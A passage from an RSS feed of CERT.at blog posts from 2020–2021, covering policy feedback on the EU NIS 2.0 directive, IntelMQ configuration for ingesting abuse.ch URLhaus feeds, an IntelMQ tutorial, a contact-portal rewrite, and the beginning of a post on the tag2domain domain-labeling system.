&lt;li class=&quot;block&quot;&gt;Once we are moving from software (whether sold shrink-wrapped, open source, sold online or bespoke) to the (online-)services provided by software, then a vulnerability might not only be a classical bug in the source code, but could also be a mistake in the operation of that software. A configuration mistake can have the same security impact as a bug in the software. It is thus necessary to take a more expansive view on the vulnerability handling and mitigation process. CERT.at has been busy for years providing operators of vulnerable services with information about obsolete software, about misconfigurations and other operational errors. Having that effort as an official task according to the NIS Directive is welcome. Nevertheless, there are clear differences to the vulnerability disclosure process for software. The text should be evaluated from that perspective, too. (e.g. w.r.t. to a vulnerability registry)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;All this needs more refinement.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;31&lt;/strong&gt;) Although similar vulnerability registries or databases do exist, these are hosted and maintained by entities which are not established in the Union. A European vulnerability registry maintained by ENISA would provide improved transparency regarding the publication process before the vulnerability is officially disclosed, and resilience in cases of disruptions or interruptions on the provision of similar services. To avoid duplication of efforts and seek complementarity to the extent possible, ENISA should explore the possibility of entering into structured cooperation agreements with similar registries in third country jurisdictions.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The world does not need a duplication of the CVE system. Mitre, who handles the CVE registry has for years tried to get other entities to provide CVE registration services. This is the way to go.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;35&lt;/strong&gt;) The competent authorities and CSIRTs should be empowered to participate in exchange schemes for officials from other Member States in order to improve cooperation.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is a good point.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;36&lt;/strong&gt;) The Union should, where appropriate, conclude international agreements, in accordance with Article 218 TFEU, with third countries or international organisations, allowing and organising their participation in some activities of the Cooperation Group and the CSIRTs network.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Yes. This was on my wish-list for NIS 2.0.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;42&lt;/strong&gt;) Essential and important entities should ensure the security of the network and information systems which they use in their activities. Those are primarily private network and information systems managed by their internal IT staff or the security of which has been outsourced.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Yes, these entities run internal IT systems. Increasingly, those are interconnected and have external interfaces to customers, business partners, suppliers and public entities.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Additionally (also covered in (44)), I find the focus on MSSPs to be strange. In terms of the overall security of entities, all outsourcing partners with administration level access to the IT systems are important. We have seen a string of reports in 2019 covering breaches in important entities caused by compromised MSPs (Managed Service Providers).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;47&lt;/strong&gt;) The supply chain risk assessments, [&amp;hellip;]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The word missing here is &amp;ldquo;digital sovereignty&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;48&lt;/strong&gt;) In order to streamline the legal obligations imposed on providers [&amp;hellip;]&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is very much needed and welcomed.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;50&lt;/strong&gt;) Given the growing importance of number-independent interpersonal communications services, it is necessary to ensure that such services are also subject to appropriate security requirements in view of their specific nature and economic importance.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Bringing in the worlds of iMessage, WhatsApp, Skype, Duo, Messenger, Signal, Threema &amp;amp; co into the folds of the NIS directive is a positive step. The language in recital (50) is a bit unclear, as the actual identifier used to address communication endpoints is not the relevant criterium. To make this a bit better, one should specify clearly that the numbers we&amp;rsquo;re talking about are E.164 phone numbers, and we want to address those interpersonal communication systems that are not covered by the telecom regulation (via which they can get allocations of E.164 numbers).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It has been my &lt;a href=&quot;https://lendl.priv.at/blog/2018/04/13/ein-anderer-vorschlag-zu-facebook/&quot;&gt;longstanding opinion&lt;/a&gt; that the over-the-Internet interpersonal communication services that reached significant market share should be covered by regulation similar to the one that covers legacy telephone systems, especially with respect to interconnection requirements. A good number of the current issues regarding market power, privacy abuses and anti-competitive behaviour of these players are actually pretty similar to what transpired in the pre-liberalized phone ecosystem.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;53&lt;/strong&gt;) In particular, providers of public electronic communications networks or publicly available electronic communications services, should inform the service recipients of particular and significant cyber threats and of measures they can take to protect the security of their communications, for instance by using specific types of software or encryption technologies.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This should also apply to vendors or devices and software that service recipients use to connect to those communication networks.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;54&lt;/strong&gt;) [&amp;hellip;] Solutions for lawful access to information in end-to-end encrypted communications should maintain the effectiveness of encryption in protecting privacy and security of communications, while providing an effective response to crime.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This sounds good in theory, but there is no information here how these contradictory goals can be both achieved at the same time. This needs to be resolved (although the NIS Directive is probably not the right place for that).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;55&lt;/strong&gt;) This Directive lays down a two-stage approach to incident reporting in order to strike the right balance between, on the one hand, swift reporting that helps mitigate the potential spread of incidents and allows entities to seek support, and, on the other hand, in-depth reporting that draws valuable lessons from individual incidents and improves over time the resilience to cyber threats of individual companies and entire sectors. Where entities become aware of an incident, they should be required to submit an initial notification within 24 hours, followed by a final report not later than one month after.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The basic premise is a good one, we need both the quick heads-up and the detailed reporting. Just be aware that it is not uncommon for larger incidents to take more that a month from detection to remediation. In such cases the &amp;ldquo;one month after start of the incident&amp;rdquo; might be too early. My suggestion is to require monthly updates and a full report no longer that one month after the resolution of the incident.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;56&lt;/strong&gt;) Essential and important entities are often in a situation where a particular incident, because of its features, needs to be reported to various authorities as a result of notification obligations included in various legal instruments. Such cases create additional burdens and may also lead to uncertainties with regard to the format and procedures of such notifications. In view of this and, for the purposes of simplifying the reporting of security incidents, Member States should establish a single entry point for all notifications required under this Directive and also under other Union law &amp;hellip;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is a really good idea and this is something the regulated entities have been requesting.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;59&lt;/strong&gt;) &amp;ndash; (&lt;strong&gt;62&lt;/strong&gt;)&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A clearer regulation regarding the requirements on the data-quality for and the access rights to the domain ownership information is welcome. Be careful regarding the definition, though: Top-Level Domains are not the only levels in the DNS where &lt;a href=&quot;https://publicsuffix.org/&quot;&gt;delegations to end-users&lt;/a&gt; can happen. See e.g., in Austria the &amp;ldquo;gv.at&amp;rdquo; or &amp;ldquo;co.at&amp;rdquo; Second Level Domains. The distribution of work and responsibilities between registries and the registrars need to be worked out as well. In the case of Registries under ICANN rules, the set of requirements need to be reconciled.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;60&lt;/strong&gt;) [&amp;hellip;] CERTs, (CSIRTs,&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Is this just a typo, or is this an indication that non-NIS accredited security teams should also have access to whois data? See also (69).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;69&lt;/strong&gt;) The processing of personal data, to the extent strictly necessary and proportionate for the purposes of ensuring network and information security by entities, public authorities, CERTs, CSIRTs, and providers of security technologies and services should constitute a legitimate interest of the data controller concerned, as referred to in Regulation (EU) 2016/679. That should include measures related to the prevention, detection, analysis and response to incidents, measures to raise awareness in relation to specific cyber threats, exchange of information in the context of vulnerability remediation&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As with (28ff), &amp;ldquo;vulnerability remediation&amp;rdquo; needs to also include configuration errors and similar operational errors. The list at the end of (69) cannot be exhaustive, we need a more generic definition of the relevant data types.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;76&lt;/strong&gt;) In order to further strengthen the effectiveness and dissuasiveness of the penalties applicable to infringements of obligations laid down pursuant to this Directive, the competent authorities should be empowered to apply sanctions consisting of the suspension of a certification or authorisation concerning part or all the services provided &amp;hellip;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A few comments here:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It&amp;rsquo;s one thing that sanctions are possible against the operators of improperly secured services, but in some cases, they are not the ones to blame, but the vendors they are relying on did not due diligence to make sure their software, hardware or services deliver the promised level of security.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;m missing here the tie-in to the security certification framework contained in the EU Cybersecurity Act.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;(&lt;strong&gt;79&lt;/strong&gt;) A peer-review mechanism should be introduced, allowing the assessment by experts designated by the Member States of the implementation of cybersecurity policies, including the level of Member States&amp;rsquo; capabilities and available resources.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This could be helpful.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Overall, the NIS 2.0 proposal is a step in the right direction.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Fri, 22 Jan 2021 14:06:54 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/1/nis2-recitals-feedback</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-01-22T14:06:54Z</dc:date></item><item><title>Abuse.ch URLhaus is a new data feed for our notifications</title><link>https://www.cert.at/en/blog/2021/1/abusech-urlhaus-new-data-feed-notifications</link><description>&lt;p class=&quot;block&quot;&gt;Since Wednesday January 13th, 2021 we are sending data of the &lt;a href=&quot;https://urlhaus.abuse.ch/&quot;&gt;URLhaus Feeds&lt;/a&gt; of the &lt;a href=&quot;https://abuse.ch/&quot;&gt;abuse.ch-project&lt;/a&gt; as part of our regular notifications to network owners. The feeds contain URLs to malware files of multiple malware families. To our knowledge, the feeds are of very high quality. Any feedback on the new data source, as well as our notifications in general is always welcome.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;How the feeds can be added to an &lt;a href=&quot;https://intelmq.readthedocs.io/&quot;&gt;IntelMQ&lt;/a&gt; instance is described in &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/feeds.html#urlhaus&quot;&gt;IntelMQ's feeds documentation&lt;/a&gt;. We added a few extra processing steps in our IntelMQ-setup due to a few internal requirements. As these configurations might be of interest to you, we will briefly describe our setup in the following section.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We have two requirements which add some complexity:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The feeds contains the &quot;Dateadded&quot; column, which refers to the first time the malware has been hosted at the given URL (added to the data as &quot;time.source&quot; by the parser). However, we want the &quot;time.source&quot; field to reflect an approximation of the most recent time the malware was still hosted on that URL. Since the data is updated periodically in sufficiently short time intervals, we can apply the following logic (in pseudocode): &lt;code&gt;time.source = time.observation - 1 hour&lt;/code&gt; whereas the time.observation refers to the time the data has been fetched by IntelMQ. This results timestamps from when the malware hosting URL was definitely still active.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;We use both the Country-feed as well as the TLD-feed. As both feeds contain overlapping data, we need to deduplicate it.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;For the first requirement, two steps are needed as it is currently not possible to achieve this with a single IntelMQ bot. First, we use a &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/bots.html#modify&quot;&gt;modify expert&lt;/a&gt; with the following configuration:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;[&#13;
        {&#13;
                &quot;rulename&quot;: &quot;set time.source to time.observation&quot;,&#13;
                &quot;if&quot;: {},&#13;
                &quot;then&quot;: {&#13;
                        &quot;time.source&quot;: &quot;{msg[time.observation]}&quot;&#13;
                }&#13;
        }&#13;
]&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Then we use an additional &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/bots.html#sieve&quot;&gt;sieve expert&lt;/a&gt;, with the following configuration:&lt;/p&gt;&#13;
&lt;pre class=&quot;block&quot;&gt;if :exists time.source {&lt;br /&gt;    add! time.source -= '1 hour'&lt;br /&gt;}&lt;/pre&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Mathematical operation on datetime objects will be supported in the upcoming IntelMQ release 2.3.0.&lt;/p&gt;&#13;
&lt;p&gt;To &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/bots.html#deduplicator&quot;&gt;deduplicate&lt;/a&gt; the combined feeds of country code and TLD, we use the following parameters:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;filter_keys&lt;/code&gt; is set to &lt;code&gt;raw,time.source,time.observation,feed.url&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;code&gt;filter_type&lt;/code&gt; is &lt;code&gt;blacklist&lt;/code&gt;&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;With a &lt;code&gt;redis_cache_ttl&lt;/code&gt; slightly lower than one day: 82800 seconds&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Both feeds are collected once per day, initiated by systemd timers. We are using the &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/configuration-management.html#scheduled-run-mode&quot;&gt;&lt;em&gt;scheduled&lt;/em&gt; run mode&lt;/a&gt; and the&amp;nbsp;&lt;a href=&quot;https://github.com/certtools/intelmq/tree/master/contrib/systemd&quot;&gt;systemd service generator&lt;/a&gt; for this purpose.&lt;/p&gt;&#13;
&lt;p&gt;In summary, the order of bots is as following:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Abuse.ch URLhaus Country Feed Collector and Abuse.ch URLhaus TLD Feed Collector&lt;/li&gt;&#13;
&lt;li&gt;Abuse.ch URLhaus Parser&lt;/li&gt;&#13;
&lt;li&gt;Modify Expert&lt;/li&gt;&#13;
&lt;li&gt;Sieve Expert&lt;/li&gt;&#13;
&lt;li&gt;Deduplicator Expert&lt;/li&gt;&#13;
&lt;li&gt;Further processing steps&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our&amp;nbsp;&lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Tue, 19 Jan 2021 15:18:52 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2021/1/abusech-urlhaus-new-data-feed-notifications</guid><dc:creator>CERT.at</dc:creator><dc:date>2021-01-19T15:18:52Z</dc:date></item><item><title>IntelMQ offers tutorial lessons and a new documentation page</title><link>https://www.cert.at/en/blog/2020/11/intelmq-tutorial-and-new-documentation-page</link><description>&lt;p class=&quot;block&quot;&gt;The IntelMQ tutorial guiding through various features and tools of IntelMQ is available in the &lt;a title=&quot;intelmq-tutorial github repository&quot; href=&quot;https://github.com/certtools/intelmq-tutorial/&quot;&gt;IntelMQ Tutorial GitHub repository&lt;/a&gt;.&lt;br /&gt;&lt;a href=&quot;https://github.com/certtools/intelmq-tutorial/blob/master/lesson-1.md&quot;&gt;Lesson one&lt;/a&gt; introduces the architecture, concepts and terminology of the project. Lessons &lt;a href=&quot;https://github.com/certtools/intelmq-tutorial/blob/master/lesson-2.md&quot;&gt;two&lt;/a&gt; and &lt;a href=&quot;https://github.com/certtools/intelmq-tutorial/blob/master/lesson-3.md&quot;&gt;three&lt;/a&gt; delve hands-on into working with IntelMQ. Starting with installation and basic usage &amp;amp; configuration they go on to tackle progressively more advanced topics like using advanced features or changing the message queue software to be used. Solutions and explanations are offered for all tasks. In the &lt;a href=&quot;https://github.com/certtools/intelmq-tutorial/blob/master/lesson-4.md&quot;&gt;last lesson&lt;/a&gt; you'll learn how to use &lt;a href=&quot;https://github.com/jhemp/intelmq-tools&quot;&gt;intelmq-tools&lt;/a&gt;, a third-party software which makes customization of your IntelMQ instance much easier.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We think that this kind of interactive online documentation is especially important nowadays when conferences and workshops cannot take place in real life.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;As for all other IntelMQ components, we welcome any contributions and feedback to the tutorial.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;New IntelMQ Documentation page&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We completely revised the way IntelMQ's documentation is presented: Instead of single files in the source-code repository, the best place to read the documentation is now &lt;a href=&quot;https://intelmq.readthedocs.io/&quot;&gt;intelmq.readthedocs.io&lt;/a&gt;. All pages are generated using &lt;a href=&quot;https://www.sphinx-doc.org/&quot;&gt;Sphinx&lt;/a&gt;, the de facto standard tool for documentation. It features a better reading experience and a significantly improved navigation. Furthermore, the new page offers an integrated &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/search.html&quot;&gt;search&lt;/a&gt; as well as &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/py-modindex.html&quot;&gt;module index&lt;/a&gt; covering the complete code documentation&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If you find any bugs or have improvements, &lt;a href=&quot;https://intelmq.readthedocs.io/en/latest/user/introduction.html#contribute&quot;&gt;please let us know&lt;/a&gt;!&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a/related to our &lt;a href=&quot;https://www.cert.at/en/about-us/projects/current#3-4-1-3&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the &lt;a href=&quot;https://csirtsnetwork.eu/&quot;&gt;CSIRTs Network&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 05 Nov 2020 20:37:17 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/11/intelmq-tutorial-and-new-documentation-page</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-11-05T20:37:17Z</dc:date></item><item><title>Development of the „Constituency-Portal“ 2.0</title><link>https://www.cert.at/en/blog/2020/10/development-of-the-constituency-portal-20</link><description>&lt;p class=&quot;block&quot;&gt;&lt;em&gt;Dieser Blogpost ist auch auf &lt;a href=&quot;https://www.cert.at/de/meldungen/blog/neuentwicklung-des-constituency-portals&quot;&gt;Deutsch&lt;/a&gt; verf&amp;uuml;gbar.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Our partner Intevation GmbH develops the next generation of the &quot;Consituency-Portal&quot;, our tool for administration of contact information.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The new version follows the current version, which is a further developed &amp;bdquo;&lt;a href=&quot;https://github.com/certat/do-portal&quot;&gt;do-portal&lt;/a&gt;&amp;ldquo; (originally developed by CERT-EU). Since 2017 we adapted this software&amp;nbsp;to our needs within the scope of &lt;a href=&quot;https://www.cert.at/de/ueber-uns/projekte/abgeschlossen#CEF-2016-AT-IA-0089&quot;&gt;CEF 2016-AT-IA-0089&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Over the years our requirements grew significantly and the software architecture was no longer able to stand up to those, also the code maintenance got harder over time. Therefore, we decided for a new version of the software in spring this year: The software design will be majorly enhanced and will be based on &lt;a href=&quot;https://laravel.com/&quot;&gt;Laravel&lt;/a&gt; and PHP. With the new version of the Constituency-Portal, we will be able to better address our daily CERT notifications to network owners with our tool &lt;a href=&quot;https://github.com/certtools/intelmq/&quot;&gt;IntelMQ,&lt;/a&gt; by a targeted attribution of networks and domains to the organisations. It is planned, that the address data can be self-managed by the Constituency themself. For this purpose the network owners will have the possibility to create user accounts themselves. The authentication will be managed by Keycloak, with which services to be developed in the future by &lt;a href=&quot;https://www.energy-cert.at/de/&quot;&gt;AEC&lt;/a&gt;/CERT.at and &lt;a href=&quot;https://www.govcert.gv.at/&quot;&gt;GovCERT&lt;/a&gt; can be integrated as well.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The development of the Software is performed by &lt;a href=&quot;https://intevation.de/&quot;&gt;Intevation GmbH&lt;/a&gt; from Osnabr&amp;uuml;ck, Germany, as Free Software until summer 2021 and is financed in large parts by &lt;a href=&quot;https://www.cert.at/de/ueber-uns/projekte/aktuell#3-4-1-3&quot;&gt;CEF 2018-AT-IA-0111&lt;/a&gt;. Intevation did already substantially advance IntelMQ as part of other projects. The open development mode emphasizes our engagement for Free Software and the international CERT-community. The tool will be available for other CERTs/CSIRTs as well. The code-repository can be found at &lt;a href=&quot;https://gitlab.com/intevation/tuency/tuency&quot;&gt;gitlab&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;hr /&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This blog post is part of a series of blog posts related to our &lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/2018-at-ia-0111&quot;&gt;CEF Telecom 2018-AT-IA-0111&lt;/a&gt; project, which also supports our participation in the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/202002051545/en_cef-1024x146.png&quot; alt=&quot;Co-financed by the European Union Connecting Europe Facility&quot; width=&quot;1024&quot; height=&quot;146&quot; /&gt;&lt;/p&gt;</description><pubDate>Thu, 22 Oct 2020 12:45:44 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2020/10/development-of-the-constituency-portal-20</guid><dc:creator>CERT.at</dc:creator><dc:date>2020-10-22T12:45:44Z</dc:date></item><item><title>tag2domain - a system for labeling DNS domains</title><link>https://www.cert.at/en/blog/2020/7/tag2domain</link><description>&lt;h1 class=&quot;block&quot;&gt;Tag2domain -&amp;nbsp;doing proper statistics on domain names&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In the course of nic.at&amp;rsquo;s Connecting Europe Facilities (CEF) project &lt;a href=&quot;https://ec.europa.eu/inea/en/connecting-europe-facility/cef-telecom/apply-funding/2018-cyber-security&quot;&gt;CEF-TC-2018-3&lt;/a&gt; we were able to focus on some long overdue but relevant research: a tagging / labeling database of domain names (in the following, we will use the words &amp;ldquo;tag&amp;rdquo; and &amp;ldquo;label&amp;rdquo; interchangeably).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This project was also presented at the &lt;a href=&quot;https://rrdg.centr.org/rrdg-rdn/&quot;&gt;Registry Data Nerds (RDN)&lt;/a&gt; virtual meeting on the 30th of June 2020. Slides are available on &lt;a href=&quot;https://github.com/certtools/tag2domain&quot;&gt;github&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;What is &quot;tag2domain&quot;?&amp;nbsp;&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Simply said, this is a structure to tag DNS domain names with arbitrary labels. Initially this seems like an easy task. However, when looked at closely, it is paramount to implement this properly. Not only will all future statistics on domains depend on a proper tagging. Doing proper statistics is anything but easy. &amp;ldquo;He who counts, will count wrongly&amp;rdquo; seems to be the motto of statistics (in German: &amp;ldquo;der, der misst, misst Mist&amp;rdquo;).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Hence, any type of labeling / tagging service must&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Be future-proof&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Be flexible&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Encompass all possible tagging systems we might come up with in the future&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Easily fit into and connect to existing databases and datasets of domain names&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Be easily query-able&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Be useable for answering ad-hoc statistical questions&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Not an easy task.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;The proposed solution&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;We arrived &amp;ndash; inspired by the &lt;a href=&quot;https://github.com/MISP/misp-taxonomies&quot;&gt;MISP&lt;/a&gt; system as well as ENISA&amp;rsquo;s &lt;a href=&quot;http://github.com/enisaeu/Reference-Security-Incident-Taxonomy-Task-Force/&quot;&gt;RIST&lt;/a&gt; taxonomy &amp;ndash; at the following schema:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A tagging system for a particular statistical domain shall be called &amp;ldquo;&lt;strong&gt;taxonomy&lt;/strong&gt;&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;A taxonomy consists of a &lt;strong&gt;name&lt;/strong&gt; (e.g. the &amp;ldquo;low content domain names taxonomy&amp;rdquo;) and some&lt;strong&gt; meta-information&lt;/strong&gt; (such as if it may be used for domain names or IP addresses or both).&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Associated with a taxonomy, is a list of possible &amp;ldquo;&lt;strong&gt;tags&lt;/strong&gt;&amp;rdquo; (i.e. labels or names which we might assign to domain names (or IP addresses)). Think of this as an enum (as in the programming language C) or a fixed list of possible values. Each taxonomy has a fixed number of tags and there should always be an &amp;ldquo;OTHER&amp;rdquo; tag which is a bucked for counting those domains which do not fall into any of the existing tags within that taxonomy.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In addition, to add a second layer (and thus flexibility), tags might have &lt;strong&gt;values&lt;/strong&gt; if they they are assigned to a domain name (or IP address).&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot;&gt;Example:&lt;/h3&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Let&amp;rsquo;s assume, we have a taxonomy which is capable of assigning industry sectors to domains: the &lt;a href=&quot;https://rrdg.centr.org/projects/standards/domain-industry-taxonomy/&quot;&gt;DIT&lt;/a&gt;&amp;nbsp;(domain industry taxonomy).&lt;/p&gt;&#13;
